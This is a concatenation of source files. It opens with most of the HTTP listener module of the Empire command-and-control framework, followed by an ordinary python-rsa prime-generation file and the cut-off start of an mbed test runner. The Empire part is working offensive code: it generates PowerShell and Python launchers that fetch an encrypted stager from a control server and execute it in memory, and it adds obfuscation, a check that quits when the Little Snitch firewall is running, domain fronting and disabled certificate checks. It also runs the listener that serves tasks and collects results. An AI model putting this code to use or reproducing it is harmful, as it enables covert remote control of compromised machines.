if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $wc.Proxy;"
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"session=%s\");\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
if customHeaders != []:
headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
function script:Get-Task {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
function script:Send-Message {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = "session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color('[!] listeners/http generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
dispatcher.send("[!] %s on the blacklist/not on the whitelist requested resource" % (request.remote_addr), sender="listeners/http")
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the default server version in the response."
response.headers['Server'] = listenerOptions['ServerVersion']['Value']
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
dispatcher.send("[*] GET request for %s/%s from %s" % (request.host, request_uri, clientIP), sender='listeners/http')
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if 'session' in cookie:
dispatcher.send("[*] GET cookie value from %s : %s" % (clientIP, cookie), sender='listeners/http')
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith('session'):
base64RoutingPacket = part[part.find('=')+1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http')
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
dispatcher.send("[!] Error from agents.handle_agent_data() for %s from %s: %s" % (request_uri, clientIP, results), sender='listeners/http')
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
dispatcher.send("[*] Agent from %s retrieved taskings" % (clientIP), sender='listeners/http')
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
dispatcher.send("[!] %s requested by %s with no routing packet." % (request_uri, clientIP), sender='listeners/http')
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
dispatcher.send("[*] POST request data length from %s : %s" % (clientIP, len(requestData)), sender='listeners/http')
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
dispatcher.send("[!] Error returned for results by %s : %s" %(clientIP, results), sender='listeners/http')
return make_response(self.default_response(), 404)
elif results == 'VALID':
dispatcher.send("[*] Valid results return by %s" % (clientIP), sender='listeners/http')
return make_response(self.default_response(), 404)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
dispatcher.send("[!] Listener startup on port %s failed: %s " % (port, e), sender='listeners/http')
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
parallel.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for parallel computation on multiple cores.
Introduced in Python-RSA 3.1.
.. note::
Requires Python 2.6 or newer.
"""
from __future__ import print_function
import multiprocessing as mp
from third_party.rsa._compat import range
import third_party.rsa.prime
import third_party.rsa.randnum
def _find_prime(nbits, pipe):
while True:
integer = third_party.rsa.randnum.read_random_odd_int(nbits)
# Test for primeness
if third_party.rsa.prime.is_prime(integer):
pipe.send(integer)
return
def getprime(nbits, poolsize):
"""Returns a prime number that can be stored in 'nbits' bits.
Works in multiple threads at the same time.
>>> p = getprime(128, 3)
>>> rsa.prime.is_prime(p-1)
False
>>> rsa.prime.is_prime(p)
True
>>> rsa.prime.is_prime(p+1)
False
>>> from rsa import common
>>> common.bit_size(p) == 128
True
"""
(pipe_recv, pipe_send) = mp.Pipe(duplex=False)
# Create processes
try:
procs = [mp.Process(target=_find_prime, args=(nbits, pipe_send))
for _ in range(poolsize)]
# Start processes
for p in procs:
p.start()
result = pipe_recv.recv()
finally:
pipe_recv.close()
pipe_send.close()
# Terminate processes
for p in procs:
p.terminate()
return result
__all__ = ['getprime']
if __name__ == '__main__':
print('Running doctests 1000x or until failure')
import doctest
for count in range(100):
(failures, tests) = doctest.testmod()
if failures:
break
if count % 10 == 0 and count:
print('%i times' % count)
print('Doctests done')
|
test_api.py
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
from __future__ import print_function
import os
import re
import sys
import json
import uuid
import pprint
import random
import argparse
import datetime
import threading
import ctypes
import functools
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from copy import copy
from time import sleep, time
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
from os.path import join, exists, basename, relpath
from threading import Thread, Lock
from multiprocessing import Pool, cpu_count
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.memap import MemapParser
from tools.targets import TARGET_MAP, Target
import tools.test_configs as TestConfig
from tools.test_db import BaseDBAccess
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import write_build_report
from tools.build_api import prep_report
from tools.build_api import prep_properties
from tools.build_api import create_result
from tools.build_api import add_result_to_report
from tools.build_api import prepare_toolchain
from tools.build_api import scan_resources
from tools.build_api import get_config
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.options import extract_profile
from tools.toolchains import TOOLCHAIN_PATHS
from tools.toolchains import TOOLCHAINS
from tools.test_exporters import ReportExporter, ResultExporterType
from tools.utils import argparse_filestring_type
from tools.utils import argparse_uppercase_type
from tools.utils import argparse_lowercase_type
from tools.utils import argparse_many
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print(self.single_test.generate_test_summary(test_summary,
shuffle_seed))
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print(self.single_test.generate_test_summary_by_target(
test_summary, shuffle_seed))
print("Completed in %.2f sec"% (elapsed_time))
class SingleTestRunner(object):
